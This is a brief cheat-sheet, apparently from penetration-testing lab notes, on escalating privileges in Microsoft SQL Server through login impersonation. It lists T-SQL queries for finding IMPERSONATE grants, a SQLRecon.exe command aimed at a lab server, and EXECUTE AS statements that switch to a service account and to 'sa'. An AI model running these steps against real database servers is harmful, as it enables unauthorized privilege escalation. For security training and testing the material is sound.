MS SQL Impersonation
Discover accounts to impersonate
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'
101 | SERVER_PRINCIPAL | 267 | 0 | 268 | 267 | IM | IMPERSONATE | G | GRANT |Look up ID's
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principalsEasier way
SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonateImpersonate
EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USEREXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin')EXECUTE AS login = 'sa'Last updated